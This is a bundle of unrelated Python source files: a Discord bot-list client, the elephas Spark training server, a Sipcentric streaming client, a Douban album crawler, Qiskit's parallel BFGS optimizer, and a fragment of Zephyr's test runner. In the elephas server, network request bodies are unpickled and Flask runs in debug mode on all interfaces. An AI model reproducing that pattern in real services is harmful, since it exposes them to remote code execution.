time.sleep(10)
|
__init__.py
|
import requests, threading, asyncio
class Threads:
def newThread(function, args=()):
new_thread = threading.Thread(target=function, args=args) # error handle threads so they output into log file
new_thread.start()
return new_thread
def postGuildCount(guild_count: str, token: str, threaded=True): # runs in background if threaded==True, in case API is slow (took ~1-2 minutes to post during testing, however did speed up)
def main(guild_count, token):
url = "https://townlist.xyz/api/bots/stats" # townlist.xyz listing.discordtownshop.com
headers = {"serverCount": guild_count,"Content-Type": "application/json","Authorization": token}
requests.post(url, headers=headers)
if threaded:
Threads.newThread(lambda: main(guild_count, token))
else:
main(guild_count, token)
async def asyncRequest(url: str, method=requests.get):
loop = asyncio.get_event_loop()
future_object = loop.run_in_executor(None, method, url)
response = await future_object
return response
async def returnBotData(bot_id: str):
response = await asyncRequest("https://townlist.xyz/api/bots/{0}".format(bot_id))
return response.json()
|
spark_model.py
|
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
from itertools import tee
import socket
from multiprocessing import Process
import six.moves.cPickle as pickle
from six.moves import range
from flask import Flask, request
try:
import urllib.request as urllib2
except ImportError:
import urllib2
from pyspark.mllib.linalg import Matrix, Vector
from .utils.rwlock import RWLock
from .utils.functional_utils import subtract_params
from .utils.rdd_utils import lp_to_simple_rdd
from .mllib.adapter import to_matrix, from_matrix, to_vector, from_vector
from .optimizers import SGD as default_optimizer
from keras.models import model_from_yaml
def get_server_weights(master_url='localhost:5000'):
'''
Retrieve master weights from parameter server
'''
request = urllib2.Request('http://{0}/parameters'.format(master_url),
headers={'Content-Type': 'application/elephas'})
ret = urllib2.urlopen(request).read()
weights = pickle.loads(ret)
return weights
def put_deltas_to_server(delta, master_url='localhost:5000'):
'''
Update master parameters with deltas from training process
'''
request = urllib2.Request('http://{0}/update'.format(master_url),
pickle.dumps(delta, -1), headers={'Content-Type': 'application/elephas'})
return urllib2.urlopen(request).read()
class SparkModel(object):
'''
SparkModel is the main abstraction of elephas. Every other model
should inherit from it.
'''
def __init__(self, sc, master_network, optimizer=None, mode='asynchronous', frequency='epoch',
num_workers=4,
master_optimizer="adam",
master_loss="categorical_crossentropy",
master_metrics=None,
custom_objects=None,
*args, **kwargs):
self.spark_context = sc
self._master_network = master_network
if custom_objects is None:
custom_objects = {}
if master_metrics is None:
master_metrics = ["accuracy"]
if optimizer is None:
self.optimizer = default_optimizer()
else:
self.optimizer = optimizer
self.mode = mode
self.frequency = frequency
self.num_workers = num_workers
self.weights = master_network.get_weights()
self.pickled_weights = None
self.lock = RWLock()
self.master_optimizer = master_optimizer
self.master_loss = master_loss
self.master_metrics = master_metrics
self.custom_objects = custom_objects
@staticmethod
def determine_master():
'''
Get URL of parameter server, running on master
'''
master_url = socket.gethostbyname(socket.gethostname()) + ':5000'
return master_url
def get_train_config(self, nb_epoch, batch_size,
verbose, validation_split):
'''
Get configuration of training parameters
'''
train_config = {}
train_config['nb_epoch'] = nb_epoch
train_config['batch_size'] = batch_size
train_config['verbose'] = verbose
train_config['validation_split'] = validation_split
return train_config
def get_config(self):
'''
Get configuration of model parameters
'''
model_config = {}
model_config['model'] = self.master_network.get_config()
model_config['optimizer'] = self.optimizer.get_config()
model_config['mode'] = self.mode
return model_config
@property
def master_network(self):
''' Get master network '''
return self._master_network
@master_network.setter
def master_network(self, network):
''' Set master network '''
self._master_network = network
def start_server(self):
''' Start parameter server'''
self.server = Process(target=self.start_service)
self.server.start()
def stop_server(self):
''' Terminate parameter server'''
self.server.terminate()
self.server.join()
def start_service(self):
''' Define service and run flask app'''
app = Flask(__name__)
self.app = app
@app.route('/')
def home():
return 'Elephas'
@app.route('/parameters', methods=['GET'])
def get_parameters():
if self.mode == 'asynchronous':
self.lock.acquire_read()
self.pickled_weights = pickle.dumps(self.weights, -1)
pickled_weights = self.pickled_weights
if self.mode == 'asynchronous':
self.lock.release()
return pickled_weights
@app.route('/update', methods=['POST'])
def update_parameters():
delta = pickle.loads(request.data)
if self.mode == 'asynchronous':
self.lock.acquire_write()
if not self.master_network.built:
self.master_network.build()
base_constraint = lambda a: a
constraints = [base_constraint for x in self.weights]
self.weights = self.optimizer.get_updates(self.weights, constraints, delta)
if self.mode == 'asynchronous':
self.lock.release()
return 'Update done'
self.app.run(host='0.0.0.0', debug=True,
threaded=True, use_reloader=False)
def predict(self, data):
'''
Get prediction probabilities for a numpy array of features
'''
return self.master_network.predict(data)
def predict_classes(self, data):
'''
Predict classes for a numpy array of features
'''
return self.master_network.predict_classes(data)
def train(self, rdd, nb_epoch=10, batch_size=32,
verbose=0, validation_split=0.1):
'''
Train an elephas model.
'''
rdd = rdd.repartition(self.num_workers)
master_url = self.determine_master()
if self.mode in ['asynchronous', 'synchronous', 'hogwild']:
self._train(rdd, nb_epoch, batch_size, verbose, validation_split, master_url)
else:
print("""Choose from one of the modes: asynchronous, synchronous or hogwild""")
def _train(self, rdd, nb_epoch=10, batch_size=32, verbose=0,
validation_split=0.1, master_url='localhost:5000'):
'''
Protected train method to make wrapping of modes easier
'''
self.master_network.compile(optimizer=self.master_optimizer, loss=self.master_loss, metrics=self.master_metrics)
if self.mode in ['asynchronous', 'hogwild']:
self.start_server()
yaml = self.master_network.to_yaml()
train_config = self.get_train_config(nb_epoch, batch_size,
verbose, validation_split)
if self.mode in ['asynchronous', 'hogwild']:
worker = AsynchronousSparkWorker(
yaml, train_config, self.frequency, master_url,
self.master_optimizer, self.master_loss, self.master_metrics, self.custom_objects
)
rdd.mapPartitions(worker.train).collect()
new_parameters = get_server_weights(master_url)
elif self.mode == 'synchronous':
init = self.master_network.get_weights()
parameters = self.spark_context.broadcast(init)
worker = SparkWorker(yaml, parameters, train_config)
deltas = rdd.mapPartitions(worker.train).collect()
new_parameters = self.master_network.get_weights()
for delta in deltas:
constraints = self.master_network.constraints
new_parameters = self.optimizer.get_updates(self.weights, constraints, delta)
self.master_network.set_weights(new_parameters)
if self.mode in ['asynchronous', 'hogwild']:
self.stop_server()
class SparkWorker(object):
'''
Synchronous Spark worker. This code will be executed on workers.
'''
def __init__(self, yaml, parameters, train_config, master_optimizer, master_loss, master_metrics, custom_objects):
self.yaml = yaml
self.parameters = parameters
self.train_config = train_config
self.master_optimizer = master_optimizer
self.master_loss = master_loss
self.master_metrics = master_metrics
self.custom_objects = custom_objects
def train(self, data_iterator):
'''
Train a keras model on a worker
'''
feature_iterator, label_iterator = tee(data_iterator, 2)
x_train = np.asarray([x for x, y in feature_iterator])
y_train = np.asarray([y for x, y in label_iterator])
model = model_from_yaml(self.yaml, self.custom_objects)
model.compile(optimizer=self.master_optimizer, loss=self.master_loss, metrics=self.master_metrics)
model.set_weights(self.parameters.value)
weights_before_training = model.get_weights()
if x_train.shape[0] > self.train_config.get('batch_size'):
model.fit(x_train, y_train, **self.train_config)
weights_after_training = model.get_weights()
deltas = subtract_params(weights_before_training, weights_after_training)
yield deltas
class AsynchronousSparkWorker(object):
'''
Asynchronous Spark worker. This code will be executed on workers.
'''
def __init__(self, yaml, train_config, frequency, master_url, master_optimizer, master_loss, master_metrics, custom_objects):
self.yaml = yaml
self.train_config = train_config
self.frequency = frequency
self.master_url = master_url
self.master_optimizer = master_optimizer
self.master_loss = master_loss
self.master_metrics = master_metrics
self.custom_objects = custom_objects
def train(self, data_iterator):
'''
Train a keras model on a worker and send asynchronous updates
to parameter server
'''
feature_iterator, label_iterator = tee(data_iterator, 2)
x_train = np.asarray([x for x, y in feature_iterator])
y_train = np.asarray([y for x, y in label_iterator])
if x_train.size == 0:
return
model = model_from_yaml(self.yaml, self.custom_objects)
model.compile(optimizer=self.master_optimizer, loss=self.master_loss, metrics=self.master_metrics)
nb_epoch = self.train_config['nb_epoch']
batch_size = self.train_config.get('batch_size')
nb_train_sample = x_train.shape[0]
nb_batch = int(np.ceil(nb_train_sample/float(batch_size)))
index_array = np.arange(nb_train_sample)
batches = [(i*batch_size, min(nb_train_sample, (i+1)*batch_size)) for i in range(0, nb_batch)]
if self.frequency == 'epoch':
for epoch in range(nb_epoch):
weights_before_training = get_server_weights(self.master_url)
model.set_weights(weights_before_training)
self.train_config['epochs'] = 1
if x_train.shape[0] > batch_size:
model.fit(x_train, y_train, **self.train_config)
weights_after_training = model.get_weights()
deltas = subtract_params(weights_before_training, weights_after_training)
put_deltas_to_server(deltas, self.master_url)
elif self.frequency == 'batch':
from keras.engine.training import slice_X
for epoch in range(nb_epoch):
if x_train.shape[0] > batch_size:
for (batch_start, batch_end) in batches:
weights_before_training = get_server_weights(self.master_url)
model.set_weights(weights_before_training)
batch_ids = index_array[batch_start:batch_end]
X = slice_X(x_train, batch_ids)
y = slice_X(y_train, batch_ids)
model.train_on_batch(X, y)
weights_after_training = model.get_weights()
deltas = subtract_params(weights_before_training, weights_after_training)
put_deltas_to_server(deltas, self.master_url)
else:
print('Choose frequency to be either batch or epoch')
yield []
class SparkMLlibModel(SparkModel):
'''
MLlib model takes RDDs of LabeledPoints. Internally we just convert
back to plain old pair RDDs and continue as in SparkModel
'''
def __init__(self, sc, master_network, optimizer=None, mode='asynchronous', frequency='epoch', num_workers=4,
master_optimizer="adam",
master_loss="categorical_crossentropy",
master_metrics=None,
custom_objects=None):
SparkModel.__init__(self, sc, master_network, optimizer, mode, frequency, num_workers,
master_optimizer=master_optimizer, master_loss=master_loss, master_metrics=master_metrics,
custom_objects=custom_objects)
def train(self, labeled_points, nb_epoch=10, batch_size=32, verbose=0, validation_split=0.1,
categorical=False, nb_classes=None):
'''
Train an elephas model on an RDD of LabeledPoints
'''
rdd = lp_to_simple_rdd(labeled_points, categorical, nb_classes)
rdd = rdd.repartition(self.num_workers)
self._train(rdd, nb_epoch, batch_size, verbose, validation_split)
def predict(self, mllib_data):
'''
Predict probabilities for an RDD of features
'''
if isinstance(mllib_data, Matrix):
return to_matrix(self.master_network.predict(from_matrix(mllib_data)))
elif isinstance(mllib_data, Vector):
return to_vector(self.master_network.predict(from_vector(mllib_data)))
else:
print('Provide either an MLLib matrix or vector')
|
__init__.py
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# nimvelo/stream/__init__.py
# Python 2.7 client library for the Nimvelo/Sipcentric API
# Copyright (c) 2015 Sipcentric Ltd. Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
import multiprocessing
import requests
import time
import logging
import simplejson as json
logger = logging.getLogger(__name__)
class Stream(object):
'''Allows you to connect to the Nimvelo (Sipcentric) streaming API
and register callbacks to your own functions.
'''
def __init__(self, parent):
self.parent = parent
self.process = multiprocessing.Process(target=self.__run)
self.username = self.parent.username # Account username
self.password = self.parent.password # Account password
self.base = self.parent.base + '/stream' # Base streaming URL (default: https://pbx.sipcentric.com/api/v1/stream)
self.heartbeat = None
self.eventsCallback = None
self.incomingcallCallback = None
self.smsreceivedCallback = None
def __proccess(self, event):
event = json.loads(event)
logger.info('Processing event')
logger.debug(event)
if event['event'] == 'heartbeat':
self.heartbeat = time.time()
return True
elif event['event'] == 'incomingcall':
if self.incomingcallCallback:
self.incomingcallCallback(event['values'])
return True
elif event['event'] == 'smsreceived':
if self.smsreceivedCallback:
self.smsreceivedCallback(event['values'])
return True
if self.eventsCallback:
self.eventsCallback(event)
return True
def __run(self):
stream = '' # Used as a buffer for the stream data
data = False # Data is not JSON until we detect it
level = 0 # JSON object depth
r = requests.get(self.base, verify=True, auth=(self.username, self.password), stream=True)
for i in r.iter_content():
if i == '{':
stream += i
level += 1
data = True
elif i == '}':
stream += i
data = False
level -= 1
if level <= 0:
self.__proccess(stream)
stream = ''
elif data is True:
stream += i
def register(self, type, callback):
# Register a function to a callback in the class
if type == 'incomingcall':
self.incomingcallCallback = callback
elif type == 'smsreceived':
self.smsreceivedCallback = callback
elif type == 'events':
self.eventsCallback = callback
logger.info('Callback registered')
def connect(self):
# Start multiprocessing thread
self.process.start()
logger.info('Connected')
def disconnect(self):
# Terminate multiprocessing thread
self.process.terminate()
logger.info('Disconnected')
|
Crawler_album_douban.py
|
#coding:utf-8
from __future__ import print_function
from bs4 import BeautifulSoup
import multiprocessing
import urllib
import re
import os
import time
def Filter_input(inputlist):
charlist = set(inputlist.split())
numlist = []
def is_number(char):
try:
int(char)
return True
except ValueError:
return False
for i in charlist:
if is_number(i):
num = int(i)
numlist.append(num)
count = len(numlist)
return numlist
def getHtml(url):
page = urllib.urlopen(url)
html = page.read()
return html
def EnterPhotos(url):
people_reg = r'https://www.douban.com/people/.+?/$'
people_url = re.compile(people_reg)
photo_reg = r'https://www.douban.com/people/.+?/.+?'
photo_url = re.compile(photo_reg)
if re.match(people_reg,url):
URL = url + 'photos'
print("正在寻找相册并打开...")
return URL
elif re.match(photo_url,url):
print("正在寻找专辑...")
return url
else:
print("你输入的链接不符合规则,请重新输入!")
return False
def getAllAlbumPagesUrl(url):
html = getHtml(url)
Soup = BeautifulSoup(html, 'lxml')
pageNumber = len(AllAlbumPageUrlList)
nextpagetags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.paginator > span.next > a')
# print(nextpagetags)
if nextpagetags:
if not AllAlbumPageUrlList:
AllAlbumPageUrlList.append(url)
nextpageurl = nextpagetags[0].get('href')
AllAlbumPageUrlList.append(nextpageurl)
getAllAlbumPagesUrl(nextpageurl)
else:
if AllAlbumPageUrlList:
print("一共%d页" % pageNumber)
else:
albumtags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div > div > a')
if albumtags:
AllAlbumPageUrlList.append(url)
# print("一共1页",AllAlbumPageUrlList)
else:
print("这里没有上传过任何照片")
class GetAlbum(object):
"""docstring for GetAlbum"""
def __init__(self, url, pagenumber):
super(GetAlbum, self).__init__()
self.url = url
self.html = getHtml(url)
self.pagenumber = pagenumber
def getAlbum(self):
Soup = BeautifulSoup(self.html, 'lxml')
data = {}
count = 0
# print Soup
imagetags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.wr > div > div > div.pl2 > a')
picnumbertags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.wr > div > div > span')
for albumhref, albumname, picnumber in zip(imagetags,imagetags,picnumbertags):
count += 1
number = self.pagenumber * 16 + count
data = {
'albumnumb':number,
'albumhref':albumhref.get('href'),
'albumname':albumname.get_text(),
'picnumber':picnumber.get_text()
}
print("------------------------------------------------",
"相册%d" % data['albumnumb'],data['albumname'],data['picnumber'],data['albumhref'],sep='\n')
AllAlbumInfoList.append(data)
def SelectAlbum(select_album_number, album_number):
if select_album_number in range(1,album_number+1):
for i in AllAlbumInfoList:
if i['albumnumb'] == select_album_number:
select_album_url = i['albumhref']
select_album_name = i['albumname']
# print(select_album_number,select_album_name,select_album_url)
return select_album_number,select_album_name,select_album_url
else:
return False
class multiProcess(multiprocessing.Process):
"""docstring for multiProcess"""
def __init__(self, func, arg, worknum):
super(multiProcess, self).__init__()
self.func = func
self.arg = arg
self.worknum = worknum
def works(self):
proc_record = []
for i in range(self.worknum):
p = multiprocessing.Process(target = self.func, args = (i,))
p.daemon = True
p.start()
proc_record.append(p)
for p in proc_record:
p.join()
if __name__ == '__main__':
t0 = time.time()
url = "https://www.douban.com/people/63226581/photos"
# url = "https://www.douban.com/people/58175165/"
# url = "https://www.douban.com/people/148026269/"
URL = EnterPhotos(url)
print(URL)
global AllAlbumPageUrlList
AllAlbumPageUrlList = []
global AllAlbumInfoList
AllAlbumInfoList = []
getAllAlbumPagesUrl(URL)
AlbumPageNumber = len(AllAlbumPageUrlList)
for i in range(AlbumPageNumber):
page_url = AllAlbumPageUrlList[i]
getAlbum = GetAlbum(page_url, i)
getAlbum.getAlbum()
AlbumNumber = len(AllAlbumInfoList)
chose_quit = 'Y'
while not chose_quit == 'N':
correctFlag = False # 用来标记有正确的相册序号出现
while (not correctFlag) and (not AlbumNumber == 0):
print("\n下载所有相册请直接输入数字'0'")
inputlist = raw_input("请输入你要下载的相册序号:")
Numlist = Filter_input(inputlist)
if Numlist and Numlist[0] == 0:
# 下载所有相册
print("正在下载所有相册,请耐心等待...")
for i in range(1,AlbumNumber+1):
select_album_number = i
AlbumInfo = SelectAlbum(select_album_number, AlbumNumber)
SelectAlbum_name = AlbumInfo[1]
SelectAlbum_url = AlbumInfo[2]
print(select_album_number, SelectAlbum_name, SelectAlbum_url)
correctFlag = True
# 下载所有相册
else:
# 选择相册序号下载
for i in Numlist:
select_album_number = i
AlbumInfo = SelectAlbum(select_album_number, AlbumNumber)
if AlbumInfo:
SelectAlbum_name = AlbumInfo[1]
SelectAlbum_url = AlbumInfo[2]
print(select_album_number,SelectAlbum_name,SelectAlbum_url)
correctFlag = True
# 选择相册序号下载
chose_quit = raw_input('\n继续选择下载请按键[Y],退出请按键[N]:')
print(time.time()- t0)
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
from typing import Optional
import multiprocessing
import platform
import logging
import numpy as np
from scipy import optimize as sciopt
from qiskit.aqua import aqua_globals
from qiskit.aqua.utils.validation import validate_min
from .optimizer import Optimizer, OptimizerSupportLevel
logger = logging.getLogger(__name__)
class P_BFGS(Optimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ['maxfun', 'factr', 'iprint']
# pylint: disable=unused-argument
def __init__(self,
maxfun: int = 1000,
factr: float = 10,
iprint: int = -1,
max_processes: Optional[int] = None) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
factr : The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
"""
if max_processes:
validate_min('max_processes', max_processes, 1)
super().__init__()
for k, v in list(locals().items()):
if k in self._OPTIONS:
self._options[k] = v
self._max_processes = max_processes
def get_support_level(self):
""" return support level dictionary """
return {
'gradient': OptimizerSupportLevel.supported,
'bounds': OptimizerSupportLevel.supported,
'initial_point': OptimizerSupportLevel.required
}
def optimize(self, num_vars, objective_function, gradient_function=None,
variable_bounds=None, initial_point=None):
num_procs = multiprocessing.cpu_count() - 1
num_procs = \
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == 'Darwin':
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
if major > '3' or (major == '3' and minor >= '8'):
num_procs = 0
logger.warning("For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported.")
elif platform.system() == 'Windows':
num_procs = 0
logger.warning("For Windows, using only current process. "
"Multiple core use not supported.")
queue = multiprocessing.Queue()
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if variable_bounds is None:
variable_bounds = [(-threshold, threshold)] * num_vars
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(num_vars, objective_function,
gradient_function, variable_bounds, _i_pt)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = aqua_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one _optimize in this process below runs the other processes will
# be running to. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(num_vars, objective_function,
gradient_function, variable_bounds, initial_point)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(self, num_vars, objective_function, gradient_function=None,
variable_bounds=None, initial_point=None):
super().optimize(num_vars, objective_function, gradient_function,
variable_bounds, initial_point)
approx_grad = bool(gradient_function is None)
sol, opt, info = sciopt.fmin_l_bfgs_b(objective_function, initial_point,
bounds=variable_bounds,
fprime=gradient_function,
approx_grad=approx_grad, **self._options)
return sol, opt, info['funcalls']
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
